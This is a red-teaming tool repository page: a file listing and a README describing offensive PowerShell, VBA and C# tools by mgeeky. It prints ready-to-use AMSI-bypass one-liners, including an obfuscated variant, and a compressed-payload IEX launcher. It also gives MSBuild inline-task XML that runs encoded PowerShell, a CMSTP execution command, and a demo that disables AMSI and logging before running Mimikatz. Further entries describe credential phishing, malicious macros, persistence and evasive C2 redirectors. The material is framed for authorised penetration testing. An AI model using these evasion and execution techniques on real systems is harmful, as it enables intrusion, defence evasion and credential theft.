mgeeky-Penetration-Testing-.../red-teaming
Mariusz B. / mgeeky c1df22ba32 Updated Readme
2020-04-30 16:58:14 -04:00
..
Bypass-ConstrainedLanguageMode Update main.cpp 2019-10-03 22:06:26 +02:00
cobalt-arsenal@53a2bd2938 Updated cobalt-arsenal 2020-04-28 16:44:44 -04:00
LAPS-Backdoor Added LAPS backdoor. 2018-12-18 23:20:18 +01:00
malleable_redirector fixed proxy2 head issue 2020-03-05 13:25:24 +01:00
PhishingPost@bbb1add733 Reworked submodules. 2018-12-18 17:56:40 +01:00
regsvcs Updated Readme 2020-04-30 16:58:14 -04:00
RobustPentestMacro@32992adea5 Reworked submodules. 2018-12-18 17:56:40 +01:00
Stracciatella@9df07e1e49 Updated submodules 2020-04-20 19:39:37 -04:00
VisualBasicObfuscator@80e7515ed6 Reworked submodules. 2018-12-18 17:56:40 +01:00
warnings Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
backdoor-drop.js Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
clickOnceSharpPickTemplate.cs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
cmstp-template.inf cmstp-template 2020-04-30 15:44:03 -04:00
compressedPowershell.py Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Count-PrivilegedGroupMembers.ps1 Added couple of tools 2020-03-04 16:51:29 +01:00
Dealing with LAPS using PowerView 3.0+.md Added a doc 2019-01-06 14:25:50 +01:00
Decode-UnattendPassword.ps1 Updated proxy2 and added Decode-UnattendPassword.ps1 2020-01-23 13:40:21 +01:00
delete-warning-div-macro.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Disable-Amsi.ps1 Quick fix 2019-06-19 15:51:04 +02:00
Disable-ScriptLogging.ps1 Quick fix 2019-06-19 15:51:04 +02:00
Export-ReconData.ps1 Update Export-ReconData.ps1 2019-01-22 00:20:32 +01:00
Find-GPODelegatedUsers.ps1 Dropped a bunch of various scripts. 2019-01-29 05:19:12 -05:00
generateMSBuildXML.py Added regsvcs directory 2020-04-30 16:54:36 -04:00
Get-DomainOUTree.ps1 Updated Get-DomainOUTree (and renamed it) 2018-12-19 14:15:39 +01:00
Get-UserPasswordEntries.ps1 Get-UserPasswordEntries.ps1 2020-03-02 15:35:18 +01:00
Handy-BloodHound-Cypher-Queries.md Update Handy-BloodHound-Cypher-Queries.md 2020-03-29 19:32:28 +02:00
Invoke-Command-Cred-Example.ps1 Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Macro-Less-Cheatsheet.md Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
macro-psh-stdin-author.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
MacroDetectSandbox.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
markOwnedNodesInNeo4j.py Added info line to markOwned... 2020-03-13 20:42:29 +01:00
msbuild-powershell-msgbox.xml Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
muti-stage-1.md Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Phish-Creds.ps1 Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
README.md Added regsvcs directory 2020-04-30 16:54:36 -04:00
Save-ReconData.ps1 Update Save-ReconData.ps1 2018-12-19 15:12:01 +01:00
set-handler.rc Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Set-PrincipalAllowedToDelegateToAccount.ps1 fixed paramter name 2019-08-22 15:47:01 +02:00
SubstitutePageMacro.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
Various-Macro-Based-RCEs.md Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
vba-macro-mac-persistence.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
vba-windows-persistence.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00
WMIPersistence.vbs Renamed directory and added new script. 2018-12-18 17:52:33 +01:00

  • backdoor-drop.js - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. (gist)

  • Bypass-ConstrainedLanguageMode - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) The way it does so is by registering a custom COM object (InProcServer32 DLL) that will act as a native .NET CLR4 host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch SessionData.LanguageMode variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.

PS >  $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage 
PS > .\Bypass-CLM.ps1
        AppLocker Constrined Language Mode Bypass via COM
        (implementation of: @xpn's technique, as documented in:)
        (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)

        Re-implemented, enhanced by: Mariusz B., mgeeky
        -----

[.] Step 0. Planted DLL files in:
        C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll
        C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll
[.] Step 1. Creating custom COM object.
[.] Step 2. Invoking it (ClmDisableDll)...
        Powershell runspace Thread ID: 8716
[+] Managed mode assembly. Disabling CLM globally.
        Current thread ID (managed/unmanaged): 8 / 8716
        Passed argument: '(called from native CLR host)'

============
Use below command to disable CLM on Demand (ignore errors):

        PS> New-Object -ComObject ClmDisableDll

============

[+] Finished. CLM status: FullLanguage

PS > New-Object -ComObject ClmDisableDll
PS > $ExecutionContext.SessionState.LanguageMode
FullLanguage 
  • clickOnceSharpPickTemplate.cs - This is a template for C# Console Project containing SharpPick technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged (ClickOnce)

  • cmstp-template.inf - INF file being a smallest possible template for CMSTP code execution technique, as described by LOLBAS project. Sample usage:

cmstp.exe /ni /s cmstp.inf
  • cobalt-arsenal - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.

  • compressedPowershell.py - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . (gist)

    Example:

$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  • Count-PrivilegedGroupMembers.ps1 - Counts number of members in predefined (or augumented from an input file) list of privileged, sensitive groups in Active Directory. Purely for statistics and overview purposes.

  • delete-warning-div-macro.vbs - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. (gist)

  • Disable-Amsi.ps1 - Tries to evade AMSI by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.

Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.

PS > "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS > . .\Disable-Amsi.ps1
PS > Disable-Amsi
[+] Disabled Script Block logging.
[+] Success via technique 1.
PS > "amsiInitFailed"
amsiInitFailed
  • OH, by the way - you can grab my custom AMSI evasion oneliners below - perfect for a one-shot use cases:

    • Technique 1A: Overwrite AmsiUtils.amsiContext's object (_HAMSICONTEXT.Signature) byte. Length: 146 bytes.
    [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
    
    • Technique 1B: Same as 1A, but obfuscated variant. (256 bytes)
    $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
    
  • Disable-ScriptLogging.ps1 - Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.

Warning: This scriptlet should be launched first, before Disable-Amsi.ps1 for better OpSec experience.

  • Export-ReconData.ps1 - Powershell script leveraging PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets like Get-*, Find-* into Clixml files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. Warning: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with "Reconnaissance using SMB session enumeration" after you've launched Invoke-UserHunter.

    WARNING: This script is compatible with newer version of PowerView (coming from dev branch as of 2018), that exposed various Get-Domain*, Find-* cmdlets. In order to save recon's data from the older PowerView, refer to my Save-ReconData.ps1 script in this directory.

    Exposed functions:

    • Export-ReconData - Launches many cmdlets and exports their Clixml outputs.
    • Import-ReconData -DirName <DIR> - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
    • Get-ReconData -DirName <DIR> - Gets names of variables that were created and contains previously imported data.
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.
  • Find-GPODelegatedUsers.ps1 - One-liner for finding GPO Delegated users that can Edit Settings of that GPO and thus could be used to Abuse GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). gist

  • Get-UserPasswordEntries.ps1 - a simple script for finding and decoding userPassword properties stored by some legacy SAMBA/linux kerberos implementations.

  • generateMSBuildXML.py - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using powershell.exe (gist)

This script can embed following data within constructed CSharp Task:

  • Powershell code
  • raw Shellcode to executed in a separate thread via CreateThread
  • .NET Assembly reflectively loaded via Assembly.Load
Example output **not minimized**:
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py     Show-Msgbox.ps1

        :: Powershell via MSBuild inline-task XML payload generation script
        To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
        Mariusz B. / mgeeky, <mb@binary-offensive.com>

[?] File not recognized as PE/EXE.

------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

  <!--  Based on Casey Smith work, Twitter: @subTee                              -->
  <!--  Automatically generated using `generateMSBuildXML.py` utility  -->
  <!--  by Mariusz B. / mgeeky <mb@binary-offensive.com>                         -->

  <Target Name="btLDoraXcZV">
    <hwiJYmWvD />
  </Target>
  <UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
            using System.Management.Automation;
            using System.Management.Automation.Runspaces;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class hwiJYmWvD : Task {
                public override bool Execute() {

                    byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");
                    string decoded = System.Text.Encoding.UTF8.GetString(payload);

                    Runspace runspace = RunspaceFactory.CreateRunspace();
                    runspace.Open();

                    Pipeline pipeline = runspace.CreatePipeline();
                    pipeline.Commands.AddScript(decoded);
                    pipeline.Invoke();

                    runspace.Close();
                    return true;
                }
            }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
------------------------------------------------------------------------------------

minimized

C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m                     
                                                                                                                  
        :: Powershell via MSBuild inline-task XML payload generation script                                       
        To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'       
        Mariusz B. / mgeeky, <mb@binary-offensive.com>                                                                
                                                                                                                  
[?] File not recognized as PE/EXE.                                                                                    
                                                                                                                  
------------------------------------------------------------------------------------                                  
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFMQkxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>                                                                                                     
------------------------------------------------------------------------------------                              
  • Get-DomainOUTree.ps1 - Collects OU lines returned from PowerView's Get-NetOU/Get-DomainOU cmdlet, and then prints that structure as a Organizational Units tree.

This scriptlet works with both older version of PowerView that got implemented Get-NetOU cmdlet, by passing its output via pipeline to Get-NetOUTree:

PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree

or with new version of PowerView coming with it's Get-DomainOU cmdlet.

PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO
   + SharedFolders
   + Departments
      + IT
      + SALES
      + LAWYERS
      + CHIEFS
      + AUDIT
      + HR
   + Software
   + Computers
      + Workstations
      + Servers
         + Data
         + Infrastructure
         + SOC
   + Groups
   + Users
      + Partners
      + Employees
      + Admins
+ Domain Controllers
+ Microsoft Exchange Security Groups
  • Handy-BloodHound-Cypher-Queries.md - A list of Bloodhound Cypher queries that I came up with during my various Active Directory security assessments (the list also includes some of my colleagues queries). (gist)

  • Invoke-Command-Cred-Example.ps1 - Example of using PSRemoting with credentials passed directly from command line. (gist)

  • MacroDetectSandbox.vbs - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. (gist)

  • Macro-Less-Cheatsheet.md - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet (gist)

  • macro-psh-stdin-author.vbs - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. (gist)

  • malleable_redirector - A proxy2 plugin for resilient, evasive C2 infrastructures covering your redirectors from AV/EDR/Sandbox/IR lurking eyes based on the CobaltStrike's Malleable C2 Profile specified. Combines advantages of classic evasion techniques such as Apache2 Mod_Rewrite/.htaccess and deep c2-profile-drive HTTP/HTTPS request inspection

  • markOwnedNodesInNeo4j.py - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.

$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
[.] Connected to neo4j instance.
[.] Marking nodes (0..10) ...
[+] Marked 10 nodes in 4.617 seconds. Finish ETA: in 16.622 seconds.
[.] Marking nodes (10..20) ...
[+] Marked 10 nodes in 4.663 seconds. Finish ETA: in 12.064 seconds.
[.] Marking nodes (20..30) ...
[+] Marked 10 nodes in 4.157 seconds. Finish ETA: in 7.167 seconds.
[.] Marking nodes (30..40) ...
[+] Marked 10 nodes in 4.365 seconds. Finish ETA: in 2.670 seconds.
[.] Marking nodes (40..46) ...
[+] Marked 6 nodes in 2.324 seconds. Finish ETA: in 0 seconds.
[+] Nodes marked as owned successfully in 20.246 seconds.
  • msbuild-powershell-msgbox.xml - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script. (gist)

  • muti-stage-1.md - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. (gist)

  • Phish-Creds.ps1 - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. (gist)

    One can additionally add, right after Get-Credential following parameters that could improve pretext's quality during social engineering attempt:

    • -Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
    • -Message "Some luring sentence" - to include some luring message
  • PhishingPost - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML

    action parameter.

  • regsvcs - Set of scripts, requirements and instructions for generating .NET Assemblies valid for Regasm/Regsvcs code execution primitives.

  • RobustPentestMacro - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.

  • Save-ReconData.ps1 - Powershell script leveraging PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets like Get-*, Find-* into Clixml files. It differs from Export-ReconData.ps1 in that it supports only older PowerView version from before 12 dec 2016. Exposed functions:

    • Save-ReconData - Launches many cmdlets and exports their Clixml outputs.
    • Load-ReconData -DirName <DIR> - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
    • Get-ReconData -DirName <DIR> - Gets names of variables that were created and contains previously imported data.
  • set-handler.rc - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. (gist)

  • Stracciatella - Powershell runspace from within C# (aka SharpPick technique) with AMSI and Script Block Logging disabled for your pleasure.

    • This program provides functionality to decode passed parameters on the fly, using Base64 and Xor single-byte decode (also combined)
    • Before launching any command, it makes sure to disable AMSI using two approaches
    • Before launching any command, it makes sure to disable Script Block logging using two approaches
    • This program does not patch any system library, system native code (think amsi.dll)
    • Efforts were made to not store decoded script/commands excessively long, in order to protect itself from memory-dumping techniques governed by EDRs and AVs
    • The resulting binary may be considered bit too large, that's because Costura.Fody NuGet package is used which bundles System.Management.Automation.dll within resulting assembly
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1

  :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
  Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>

[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage

PS> & '.\Test2.ps1'
PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode
[+] Yeeey, it really worked.
It works like a charm!
FullLanguage

PS D:\> "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS D:\> . .\Invoke-Mimikatz.ps1
At line:1 char:1
+ . .\Invoke-Mimikatz.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS D:\> .\Stracciatella.exe -v

  :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
  Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>

[-] It looks like no script path was given.
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage

Stracciatella D:\> . .\Invoke-Mimikatz.ps1

Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit"

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

mimikatz(powershell) # ;
  • SubstitutePageMacro.vbs - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named RealDoc (configured via variable autoTextTemplateName ). (gist)

  • warnings\EN-Word.docx and warnings\EN-Excel.docx - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.

  • WMIPersistence.vbs - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. (gist)

  • Various-Macro-Based-RCEs.md - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. (gist)

  • vba-macro-mac-persistence.vbs - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. (gist)

  • vba-windows-persistence.vbs - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. (gist)

  • VisualBasicObfuscator - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.